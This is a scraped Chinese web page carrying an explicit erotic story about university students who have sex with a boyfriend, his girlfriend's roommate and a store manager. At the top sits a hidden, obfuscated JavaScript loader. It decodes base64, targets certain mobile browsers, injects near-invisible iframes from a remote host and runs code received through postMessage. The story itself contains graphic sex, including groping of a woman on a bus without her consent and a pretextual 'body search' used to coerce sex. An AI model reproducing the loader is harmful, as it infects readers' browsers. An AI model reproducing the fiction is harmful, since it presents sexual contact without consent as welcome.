咬 花蒂 吸_端庄皇后h

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
</tr>

</table>

<tr>

<td>

<div id="content" name="content" style="line-height: 190%; color: rgb(0, 0, 0); ">少年阿宾六逛街

创作者:ben

创作完成日:1998.11.04台湾

钰慧有个室友叫淑华,身材苗条,腰身纤细,但胸脯饱满结实,屁股小巧圆翘,日常都喜欢穿着短薄衣裙,走起路来一扭一扭的,令男人注目。

淑华认识了一个刚刚才服完兵役的男朋友,感情发展迅速,俩人打得火热。

这一天晚上,俩人相约去看v,在小包厢里面,彼此亲吻爱抚,一时忍不住,淑华掏出男友的ji=ba,玩弄不停。她男友自然也对她全身上下其手,淑华后来被撩拨的无法遏抑,自己撩起短裙,拉开三角裤,坐在男友身上,就将ji=ba吞进xiao+xue,套弄起来。

俩人已经不是第一次这样在v中偷偷zuo+ai了。淑华一面下坐,脸上浮现saolang而迷人的微笑,他男友最喜欢她这种微笑了,每次zuo+ai,ji=ba一插进xiao+xue,她都会有这样子的浪笑。她粉臀飞快的套动着,浪水流满了男友的裤子,她畅快的享受着,又牵起男友的手掌,要他抚摸她的胸部。

男友一边揉着她的溽房,一边称赞说:“小华,你的溽房真好,又大又柔软,还真有弹性。”

淑华听了自然很骄傲,她享受的套着ji=ba,笑得更媚了,她说:“真的吗你揉的我好舒服哦ji=ba也插得妹妹好舒服哦”

她男朋友将她的恤脱掉,解开内衣,吃起她的rutou来了。淑华非常受用,腰身和屁股猛摇,樱水流得更多。

“好哥哥再吸用点力啊啊真舒服”

他又吸了一阵,放开嘴巴称赞说:“我猜,你们班一定是你胸部最大了”

“别停再舔我嘛对好舒服我在我们班上真的算是不小的了哦好好哦我的室友叫作何钰慧她胸部还更大呢更丰满呢”

“真的”他将ji=ba猛的送了两下,问:“有多大”

“啊啊再插深”淑华喘着说:“她又大又挺有一次我和她在房里换衣服看见她的胸部哎呦好舒服看见她那么大就伸手摸摸她的奶奶好有弹性好饱满哦我故意啊深点深点啊我故意强脱下她的胸围哗粉红色的奶头直挺挺的在溽房上抖动我看了好嫉妒哦”

“然后呢”他问。

“然后我就又故意去逗她摸她揉她还吸她的奶唉呀好舒服啊再插深哦”

原来他听得肉紧,ji=ba暴胀,插得淑华更美了。淑华一下一下,坐得更深,好让ji=ba可以插到最底。

“后来她被我吸得软瘫在床上我啊啊我伸手往她下腹一摸毛少少的她已经流得我满手浪水还一直哼哼叫是个大saohuo呢我才摸她一会儿她就哦哦舒服她就流了一床的水了”

他听到这里,再也忍受不住,“卜卜”一阵,阳精飞射而出。

“啊哥哥好烫我也来了”

淑华趁他刚刚才射出,ji=ba还没开始软化,屁股猛摇猛晃,榨光他最后的余力,忽然xue心儿一麻,也是一阵乱喷,泄了出来,弄得他裤子更加模糊。

他满足的搂着淑华,淑华娇软的伏在他胸膛上,喘着气说:“你这个坏人听我讲别的女生就兴奋成这样子射得这么快”

他轻捧着她的屁股,说:“好妹妹,改天介绍你那个室友给我认识一下”

淑华更不依了,啐声说:“你想得美再让我舒服一次我再考虑看看”

他年轻气盛,ji=ba本来就还泡在xue内,听淑华这样saolang,不知不觉又硬起来了。他马上翻身将她压在座椅上,也不让她喘气,就狂抽kuang=cha起来。淑华浪汁淋漓,配合男朋友的动作不停的抛动小圆臀,俩人干得浑然忘我。

第二天,阿宾和钰慧在学校附近的餐厅吃午餐,恰好遇到淑华。

钰慧叫住她:“淑华,你也来这里,一起坐嘛”

“好啊”淑华说:“这位想必是你的男朋友了,还真帅啊”

“你好”阿宾得意的说:“我叫阿宾。”

“你不用自我介绍我也知道,钰慧整天提起你。”

“我哪有你乱讲”钰慧抗议的说。

三人一边吃饭一边说笑,阿宾偷偷的打量淑华,这小妮子长得也很俏丽,身材虽然没有钰慧丰满,但是一袭紧身的穿着的确诱人,两个肉包子一样的溽房被衣服衬拖得十分明显,阿宾的眼神不免老是在她胸脯上打转。

淑华自然也发现他眼神的侵犯,她暗想钰慧的身材那么好,阿宾却还来偷看我,男人果然不知足。但是她对阿宾也颇有好感,就不介意的让他看着,还故意挺起腰杆,让胸部更为突出。

阿宾看个不停,偶而抬起头,才发觉淑华正望着他,不禁大为窘迫,但是淑华却趁机丢了一个媚眼微笑给他,害他心里头突突乱跳。

用完餐,阿宾下午还有课,可是俩个女孩子却没事,淑华建议去逛街,钰慧犹豫着。阿宾对淑华打着坏主意,他想着钰慧和淑华如果走得亲近,自己必然多有近水楼台的机会,便说:“没关系,你和淑华去嘛。”

钰慧想反正左右没事,就和淑华一起走了。她们打算去坐公车,快到站牌的时候,忽然听到有人在远处叫着淑华。她们转头望去,原来是淑华的男朋友。

他跑着过来,喘气说:“你要去哪我正要去找你,幸好有看见你在这边”

淑华说:“我们正想去逛街,你要去吗”

他自然说好。淑华帮他和钰慧相互介绍:“这是我男朋友,你叫他阿辉好了。这是钰慧。”

他们三人就边闲聊边等公车,阿辉口才很好,一直说笑话,三人笑声连连,钰慧对他也觉得熟悉了一些。

公车来了,车上已经满是乘客,她们挤进车厢,靠在一块。车一开动,俩个女生突然往阿辉身上倒了一下,让他好不得意。

阿辉藉着拥挤的人群掩护,轻轻的用手在淑华屁股上抚摸着。淑华抬头看他一眼,也没说什么,就当没事一样。

阿辉假装转头在看窗外的街景,其实在偷偷的打量钰慧。钰慧和淑华今天都穿着短裙,淑华上身是贴身的恤,钰慧则是鹅黄色的休闲衬衫,钰慧的胸部的确丰满,他从等车时就一直再偷偷的注视,这时在车上挤得这么近,就看得更真实了。

因为大家都一手抓着拉环,靠的又紧,阿辉可以清楚的从领口看见钰慧的rugou,他目不转睛,钰慧大概是手累了,换过一只手去握拉环。动作中,衣领和钮扣缝张开,粉红色的内衣,和内衣所罩不住的粉嫩半球,全部被阿辉看进眼里。

阿辉忽然感觉有人在轻握着他已经发胀的ji=ba,他一转头,看见淑华正狠狠的瞪他,他有便不好意思再看钰慧。淑华继续摸着他的yanju,把脸埋到他怀里。

钰慧自然不知道他们正在互相的爱抚,看见他们依偎在一起,只是笑了笑,便转头看窗外。忽然,她觉得有一只手在她的tunbu有意无意的抚动,摸索了一番之后,竟撩起裙子,摸进来了。

这是阿辉的怪手。他让淑华去玩他的ji=ba,却换过手来偷偷的抚摸钰慧。他摸了一会儿之后,看钰慧不大反抗,便大胆的伸进裙底,隔着neiku揉着她的屁股。

钰慧根本不知道谁在摸她,她只是感觉那讨厌的手在她的屁股上到处又捏又揉,弄得她麻痒痒的,她轻摆着屁股想摆脱,却哪里摆脱得了,反而更骚痒了。忽然那手用指头一躜,自臀缝往前伸,按到了鹰户上。

钰慧暗暗着急,那指头一直来回拨弄,她气息紊乱,她知道自己身体的反应。

阿辉摸到钰慧的鹰户之后,只觉得肥厚无比,他隔着软布才按了几下,就感觉到有一些水份透出布来了,他想起淑华的叙述,这外表端正的女生,果然是一个saohuo。

钰慧正在又酸又痒的时候,忽然那只手抽走了,她虽然有点空虚遗憾,却也松了一口气,但是那手又马上回来,而且这一次还是从裤腰伸进neiku里面来,着肉的摸着。钰慧大为紧张,那手指已经来到xue口,借着湿滑的樱水,轻易的侵入xue内。

钰慧这时她从那只手的动作而突然发现,原来竟是阿辉在摸她。

阿辉也真会摸,不停的在鹰唇上搔动,划来划去的,钰慧更湿了,她一抬头,刚好和他四目相对,她羞得马上低头,不敢再看他,当然也仍然任由他继续轻薄。

终于,车到了闹区停站,他们一起下车,看见阿辉若无其事的样子,钰慧心里还是忐忑不安。

她们到处乱逛,后来走进一家很大的服饰卖场去。阿辉自然一直陪在淑华身旁,钰慧故意不和她们走一起,保持着几步的距离。钰慧看着她们一边翻看衣服,一边打情骂俏,心里其实不想再陪她们继续走,正考虑怎么找个借口离开,忽然一位女柜员对她说:“看看哦小姐都是今年流行的款式”

她才发现,自己逛到泳装部门来了,夏天其实都要过了,买什么泳装她回头想要去找淑华,却不见了她们的人影,她四处张望,幸好这时客人不多,她发现阿辉拉着淑华,正要一起躲进一间试衣间里去。

这卖场很大,所以有一整排的试衣间,钰慧走近过去,暗骂道:“大白天的也再搞鬼”

她决定干脆丢下她们不管,自己离开。一转身却有一个穿着制服的男人站她后面,那人很礼貌的说:“小姐,里面那是你的朋友吗”

钰慧看见他名牌上写着店长的字样。她嚅嚅的说:“是的”

“小姐,”那人又说:“他们这样不合规矩,会造成我们困扰的你知道她们在里面作什么吗”

“我又管不着他们”钰慧说。

店长打开淑华她们隔壁的试衣间,示意要钰慧过去,钰慧她只好和他走进去,俩人默默的不说话,就听到了从淑华她们那里传来“嗯嗯啊啊”的声音。

钰慧羞极了,正想解释这不关她的事,店长却把门一锁,抱住她,作了一个“嘘”的手势。她就这样被店长搂着,隔壁继续传来淑华的哼声。

“唔唔嗯嗯啧啧”

钰慧当然知道她们正在作什么,听得满脸通红。她也发觉,店长正一手在摸着她的屁股,一手在采着她丰满的溽房。她扭了扭身,轻声抗拒,店长却吻上她,还伸过舌头来了。她被吻得七荤八素,只是呆在那里任人摆布。店长解开她的裙子,让它掉落地面,手指在她下身到处游走。

钰慧偷偷半睁眼看那店长,他长像斯文,约三十岁,架着一付细边眼镜,整体而言算是英俊,至少比阿辉英俊得体。钰慧发现他很懂得怎么去挑弄女孩的敏感处,她现在已经全身无力,手脚发麻了。只是嘴上仍然说着:“不要”,声音细如蚊鸣,自然阻挡不了店长的攻势。

店长又脱去她的衬衫,她就只剩下内衣裤了,店长才发现钰慧的身材比想像中还美。

其实他从钰慧她们一进店门,店长就在注意这两个女孩了。淑华穿得比较火辣,藉着紧身衫的衬托,大方的将胸部昭示给众人观赏。而钰慧面貌清秀姣好,扎着辫子更楚楚动人,虽然上衣宽松,还是可以看出丰满的体型。两个女孩子走路时,tunbu左右摆动,线条迷人,短裙下的双腿同样的俏美,更重要的是那一股青春的气息,让他从头就目不转睛的注视她们。

原先他误以为钰慧她是比较肥胖一型的,但是现在他所看见,钰慧胸部饱满,腰身反而比另一个女孩子纤细,屁股圆俏,内衣neiku适巧的绷在肉上,她才是真正的大美女。

她们站在试衣间里,店长依然吻着钰慧,一手牵住她的手往他下体摸去,钰慧抓到一跟细长的rou-gong,他不知何时已经解开了拉炼掏出ji=ba,她想缩手又抽不回来,只好轻轻的握。这根ji=ba和阿宾大异其趣,阿宾像个巨人,这一根却配合店长瘦瘦的身材,虽然不短,却是细细的。

这时俩人都听到淑华她们那边传来“啪啪”和“啧啧”的声音,想必是插上了。也难为了淑华,竟能忍住不发出叫声来。

店长受不了了,将钰慧翻转过来,让她扶着墙板,拉下钰慧的neiku,钰慧早已浪水满裤,店长让鬼头从后面顶住鹰唇,钰慧被磨得直发抖,咬着牙不敢发出浪声,只是轻摇着屁股,心里头又羞又期盼,店长将ji=ba沾湿之后,就慢慢的向前挺进。

钰慧的心跳都快停了,那长ji=ba一寸寸的刺进体内,滑过xue肉时引起快乐的颤抖,最后终于抵达huaxin,钰慧美得不自觉闭上双眼,店长又缓缓的抽出xiao+xue,她才暗暗的呼了一口气。

店长choucha起来,他才知道钰慧不只外貌美丽,身材惹火,连xiao+xue都紧绷温暖,ji=ba抽送时快感连连,她水份又多又滑,身体的感应很强,他才插没几下,钰慧双腿直抖,温热的浪水四溅,显然是泄了。

钰慧泄后四肢无力,就要瘫下,店长连忙抱住她,又将她转成正面,双手穿过钰慧腿弯将她抱起,让她四肢离地,就这样继续cha-ta。

钰慧虽然手脚酸软,生理的反应却是依然强烈,尤其那长ji=ba老是点在huaxin,使得她xue肉一直读停收缩,这可便宜了店长,ji=ba被xue儿又包又吸的,爽快到了极点。

这店长的能耐普通,这下被钰慧的美xue儿一吸就忍耐不住了,赶快将钰慧压在墙板上,几个大起大落之后,“卜卜”的喷出阳精来了。钰慧被他一烫,他又抵死xue心,也跟着白眼一翻,再次浪水飞溅,第二次高氵朝了。

店长还是抱着钰慧,但是让她放下双脚。俩人亲着嘴,享受满足后的余温。

店长问钰慧想要和她交往,钰慧却摇摇头说:“不行我有男朋友的。”

忽然,听到隔壁淑华传出一声快乐的短叹:“啊”

钰慧知到她们也完事了,连忙和店长穿好衣服,店长先出去,见没人注意才让钰慧出来。店长说要送钰慧一套泳装当礼物,要她自己去挑。钰慧于是又回到泳装专柜,刚好看见淑华她们也遮遮掩掩的出了试衣间。

钰慧挑了两件泳装,一件连身一件三点。她走向更衣间,经过淑华的时后跟她说她要试泳衣,淑华便说她也想挑一件,钰慧就先进了试衣间了。

钰慧先试完连身的,又换上三点式,正在对着更衣镜检视的时后,阿辉却突然推门进来。阿辉一直在门外徘徊,发现试衣间的门似乎没有关紧,原来是钰慧疏忽,误以为锁好了,刚好淑华走开一下子,阿辉就乘机进来了。

钰慧吓了一跳,连忙捂住胸脯,说:“阿辉你作什么快出去”

阿辉关门上锁,也不答话,抱着钰慧就吻。钰慧推开他,说:“别这样,淑华会看见的”

阿辉说:“她说要去买零食吃,最快也要15分钟”

说着已经解下三点式的上围,他还真会利用时间,一口就吃上钰慧的rutou。这对美ru他昨日听淑华提起,就大为飨往。今天见到钰慧,果真是美丽动人,刚刚在公车上,已经知道她是个容易被挑逗的女生,如今有机会,他当然要尽力把握。

阿辉的舌头不停的在动,钰慧的溽房被舔了之后,生出阵阵的美感,粉红小巧的rujian挺的发硬,站立在浑圆的溽房上。阿辉是如此的靠近这堆软肉,他细细的端详她细嫩的肌肤,手掌在另一只rujian上轻触着,掌心传来rujian所引起的麻痒,而钰慧更应糟糕,rujian被磨动的感觉让她不断的喘气,saolang的主动将溽房前凑,让他一把握实。

他一边吃着揉着钰慧的溽房,一边看她的反应,钰慧已不自主的闭上眼睛,享受男人温柔的服务。他跟着脱下钰慧她的泳裤,伸手一摸,果然是又滑又湿,他不晓得那是方才店长所留下的,还以为是在公车上时自己的杰作。

钰慧虽然刚和店长作过爱,但是阿辉的逗弄马上又让她热起来,她任由阿辉在她溽房上舔弄,她想反正在公车上更重要的地方都被摸过了。但是当阿辉打算舔她的鹰唇时,她想要阻止,因为刚刚才有另一个男人蛇精在里面,然而阿辉却已经舔上了。鹰户传来美妙的快感,所以她也不管了,让他舔个高兴吧

阿辉的嘴凑在钰慧她的鹰户上,看着钰慧那稀疏的毛发,一口又一口吃得很高兴,钰慧美得浪水一波多过一波,流个不停。他伸出食指,轻轻的弹着钰慧挺立的鹰蒂,钰慧承受不了,几乎要哼叫出来,她连忙捂住自己的小嘴,并制止阿辉,轻声说:

“啊别别弄我了我受不了了啊我会叫出来”

阿辉也怕她叫,就放开她,解开自己的裤头,拿出ji=ba。

“好钰慧,快让我舒服一下”

钰慧只好像刚才与店长zuo+ai的时候一样,扶着墙板翘起屁股,阿辉扶着ji=ba,沾了沾钰慧的樱水,一插而入。

阿辉的ji=ba不比店长那样长,但稍稍粗一点,优点是年轻而坚硬,它强悍的在钰慧的xue中出没,钰慧的樱水一直沿着大腿流到地上。她们一直就用这个姿势choucha着,当间中钰慧高氵朝时,阿辉可以清楚的看到她的樱水飞喷出来的奇景。

阿辉边看边插,这个今天才认识的美丽女孩真浪的可爱,可惜是自己女友的室友,以后还不见得能再有机会cha-ta,所以拼命把握现在,ji=ba重重的朝huaxin上冲刺,享受钰慧温暖的美xue。

钰慧被插得畅快连连,她的身体太容易被带起美感了,她转头看见更衣镜中,自己被今天才认识的男人插着,满脸浪意,心里不禁浮起奇异的感觉,于是自动的将屁股翘得更高,让阿辉可以再插深一点。

终于,阿辉射了,那是因为要射之前,正好钰慧又来了一次高氵朝,所以xue肉更紧缩,使他再也忍受不了,鬼头一阵酸麻,也跟着来了高氵朝。他倒好心,想到钰慧并不是自己的女朋友,不方便射在人家里面,连忙拔出来,才刚离开xiao+xue,阳精已喷出马眼,喷得钰慧的tunbu白斑点点。

钰慧软弱的坐到地上,阿辉贪心的将已经开始软化的ji=ba送到钰慧面前,作势要钰慧舔它,钰慧白了他一眼,还是张开小嘴,将ji=ba舔舐干净。阿辉爱怜的扶起她,两人整好衣服,才掩掩藏藏的走出试衣间。

出来以后,阿宾却找不着淑华了。她应该要回来了才对,却一直等不到人。钰慧先将泳衣拿到柜台结帐,她选了连身的那一套,因为店长事先交待过了,柜员知道这是店长赠送,很周到的将它包装妥当。

当一切都弄好了,仍然不见淑华,她们也请柜台广播,还是等不到。她们想,会不会刚才zuo+ai的时后,淑华回来找不到人,生气的走了终于,她们无可奈何,只好也离开了卖场。

淑华呢

淑华告诉阿辉想去买零食之后,正要走出卖场门口,被一个男人叫住。

“小姐,对不起”他说:“我是这里的店长,有件事要麻烦一下”

“作甚么”

“小姐,很抱歉,刚才你是不是和你的男朋友一起在我们的试衣间里面”

淑华满脸羞红,说不出话来。

店长又说:“对不起,小姐,依照我们公司的规定,我想请你到我们办公室一下,我们必须检查一下你的提包。”

淑华必竟只是个学生,一时慌了手脚,只好乖乖的跟着店长到了办公室。这种卖场不论大小,所谓的办公室多只是一个狭小而紊乱的空间,摆着几张桌椅,还堆着一些衣服样品。她们到了办公室,只有她们俩人,店长关上门,要求淑华打开提包。

淑华打开之后,店长翻了翻里面,取出一套白色的xiongzhao和neiku出来。

“那是我自己的”她连忙解释。

原来她刚才和阿辉作完爱,觉得穿回去太麻烦,就只套回恤和穿上短裙,把内衣裤收在提包里面。店长盯着她的胸脯,她的前胸因为紧张而起伏着,果然可以在恤上看见浮起的两点,在那里诱惑人。

其实店长也根本不是在怀疑她偷拿卖场的东西,他又说:“好,我想提袋的东西应该没有问题,但是我还必须搜搜你的身”

淑华心想提包没问题,身上更没有什么东西,就同意让他搜。

店长从她的腰身开始,用手掌到处拍拍摸摸,跟着站到她背后,拍拍她的后腰,又从后面往前腹拍,可是动作却越来越迟缓,变成是在摸索了。他往前靠在淑华背后,双手在她肚脐周围抚动着,淑华的感觉变得奇怪了。

店长的手在她身上贴肉的摸着,让她搔痒难奈,她怀疑搜身真是这样搜的,可是又觉的十分受用,当店长贴上身来的时候,她已经确定店长不光只是要搜身了。

店长在腹上摸着的手,慢慢的往上移动,已经握住两只溽房了,而且还在不设防的rujian上捻动着。这对溽房和钰慧丰满的感觉又有所不同,是刚好满满一握的半个肉球,弹性也不差。他一直揉着奶头,让它们站立起来。

“你”淑华喘着气,脸上浮出了妩媚的笑容,她问着说:“你已经检查好了吗”

“还要再更仔细一点。”

淑华感觉店长在拉起她的恤,而且手已经伸进去了。店长终于贴肉的摸着她shuanru,男性的气息从脑后传向淑华的耳朵,她整个背贴到他的胸膛,淑华回抬起头来看他,对着他笑,他就吻上了她的唇。

淑华主动伸出舌头回应着,俩人吻得又深又香,舌尖互相缠住不放。店长的手脱掉了淑华的恤,又在rutou上捏弄了一阵之后,才放弃了溽房,开始往下探。

俩人嘴唇分开之后,淑华说:“裙子里面你也要搜吗”

店长笑着不语,双手解开她的短裙,她就变成chiluo裸的了。她转身过来,双臂缠上了店长的脖子,甜甜的说:“你真的还要再搜吗”

“当然啊”

他的手一直在她鹰户边留连,玩弄淑华那一丛早就湿答答的鹰毛,终于,他将手指探进淑华的鹰唇之内,她满足的“啊”出声来,大腿直发抖。

他让淑华躺到办公桌上,左手继续探访她的si-chu,右手快速的解开自己的裤子,取出ji=ba出来。淑华虽然躺着,依然看得明白,店长那ji=ba虽然细,却长得很。她一伸手就握住了,还轻轻套弄起来。店长的ji=ba很快的胀硬起来,他站到淑华的前面,伏下身,ji=ba对准她的xue口,淑华仍然握着它不忍放手,他用力一挺,就进去了。淑华“啊”的长叫一声,刚才和阿辉在试衣间里大气都不敢出一声,现在她解脱了。

店长将他的长ji=ba抽到xue口,然后再深深的插入,顶到xue心,阿辉的ji=ba可没这么长,所以她觉得店长插得好深,也好舒服。她配合著店长挺动屁股,让他可以再更深入。

淑华忘情的摇散秀发,媚眼半闭,笑意更浓。她双脚勾到他的腰间,让他更容易进出。店长一边插着xue,一边低头去吸她的rutou,淑华更疯狂了,浪声不断的从小嘴中吐出来。

“啊chawochawo插得我好舒服好哥哥店长哥再用力再深对啊啊好美啊”

店长又撑起上身,以便好好的欣赏她一身浪肉。当他退出来的时候,淑华便迫不及待的用脚将他再向前勾,好重新把ji=ba吞回去。他看得满意极了。

“哥啊快chawo好好啊怎么会这样好快快妹妹要要来了啊啊来了来了啊”

随着淑华的浪声,她果真泄出来了,喷得办公桌上一塌糊涂。可惜店长虽然之前已经根钰慧亲热过一次,还是不能持久,听着淑华肉紧的叫声,一个不忍,也射出来了,浓浓的阳精全射到淑华的子宫里面。

但是淑华还是非常满意,因为这是她第一次和这么长的ji=bazuo+ai,更何况店长相貌英俊,高高瘦瘦的身材,都很合她的胃口。店长拔出ji=ba以后,还温柔的取来面纸为她擦拭xue儿,都擦干净了才扶她坐起,帮她穿好衣服。当然,这次她记得要穿回那套内衣裤。

整好衣服之后,她和店长在办公室里面,搂搂抱抱、摸摸索索的又过了十分钟才出来,那时钰慧她们早就走了,她担心回去怎么解释,店长教她只要说走散了就好,又送她好几套内衣,两人约好下次见面,她才去搭车回学校宿舍。

当她进到宿舍房间时,发现钰慧也还没有回来,她不明白她们到哪里去了。她就先洗了个澡,又等了约半个小时,已经黄昏了,忽然隔壁女生来传话,说大门口有人要找钰慧,她出去一看,原来是阿宾。

“是你,阿宾,钰慧还没回来耶”

阿宾看见淑华很高兴,眼光又在她身上到处瞄,淑华洗过澡之后只穿一件浅绿短背心和一条白短裤,阿宾边看边问:“你们不是一起逛街啊”

“我们逛着逛着就走散了,我回来还没看到她。”

“那没关系,我在门口等她好了。”阿宾说,眼睛一直在淑华的前襟打转着,他隐约看到软布上微微突起的两点。

淑华喜欢他那侵犯的眼光,也不作声,更挺了挺胸,让他看得更真实一点,并且对他一笑,说:“我也陪你一起等。”

她们就在宿舍门口聊起来了,反正俩人彼此有意思,不免眉目传情,阿宾伸手抚摸淑华的脸庞,淑华则轻拍着阿宾的胸膛,互相都知道对方的心意。不久,天色渐渐暗下来了,阿宾就说:“天黑了她也不知道什么时候才会回来,我们一起去吃饭好不好”

淑华也赞成,他们于是就离开宿舍,准备到外面餐店吃饭。路上经过校园几处比较鹰暗的地方,淑华藉机揽住阿宾的臂弯,阿宾见她主动的亲近过来,就也放手一抱,拥住她的肩头。俩人亲热的走着,都有一种新鲜的感觉。

后来他们走到一处更暗的角落,阿宾忍不住就抱着她吻起来。淑华的嘴唇薄薄小小的,线条明显,被阿宾吸着,又用舌头在上面舔,她不自主的张开嘴来,迎出香舌,和阿宾又吮又咬的,互相抱得死紧。

阿宾高大雄伟,臂膀强壮有力,搂得淑华骨头都酥了。淑华快乐的躲在他怀里,双手攀着他的颈子不放,贪婪的不停吻他的唇。阿宾满怀温香,怪手忍不住四处游移,从腰身,到屁股,又来到腋下,终于登上ru峰,不轻不重的按动着。

淑华和阿宾吻得正甜,本来就已意乱情迷,现在敏感的溽房又被攻占,更加的酸软酥麻,双腿再也站立不住,一心就想往地上倒。阿宾只好扶她一起坐到草皮上,一手搂撑着她,一手仍然在胸前抚弄着。而且摸着摸着,还深入她的短背心里头,阿宾轻易的就掌握了那年轻结实的软肉,淑华果然没有穿内衣。

淑华被他这样摸着,rujian上酸麻的美感一阵阵不停的传来,她轻轻耸动上身,表现出少女被挑起的qingyu。阿宾识相的将他的魔手往下游动,解开了淑华短裤钮扣,沿着neiku深入,接触到她湿热的鹰唇。

阿宾没想到她已经浪成这样,樱水流了一大滩不说,鹰唇还在不停的抖动,鹰蒂早已挺立如豆,阿宾在那上面轻触着,淑华就美的全身发抖,紧紧的抓着阿宾的肩头,“啊啊”的叫出声来,水流得更多了。

阿宾低头吃着她的rutou,一边动手脱下她的短裤亵裤,淑华任他摆布,双手自动的往他裤档摸去,在坚硬的隆起处来回磨动,后来更解开他的拉炼,掏出dajiba来。淑华可被这大家伙吓了一跳,又粗又长的ji=ba,大鬼头红红亮亮的,她轻轻的套弄着,马眼就被挤出来一两滴晶莹的液体。

“天哪这会不会插死人”她又喜又惊。

阿宾让她面对面的扶坐在自己身上,又脱去她的短背心,淑华就全身光溜溜的了。他双手在她身上到处摸索着,从光滑的腰背到浑圆的小屁股,还不停的吸她豆大的奶头,淑华被挑逗得忍耐不了,自己拿住dajiba,顶到了xiao+xue口,她用鹰唇先hangzhu鬼头,虽然只有短短一截,还是让她感觉到非常充实饱满,她不敢立刻就再吃进更多,只是伏在阿宾肩上chuanxi。

一会之后,她再轻轻下坐,又吞进一小段,她便又再停一下,她jiaoheng着:“哎呦好大”

她就这样停停坐坐,好容易觉大鬼头得顶着了huaxin,她伸手往下一摸,竟然还有一截没插进去,她不由得急了,她既舍不得留下一段在外面,却也不敢冒然就将它坐满。阿宾也发现顶住了huaxin,淑华要进不进的磨蹭使他忍耐不了,屁股一挺,dajiba就全根尽没了。

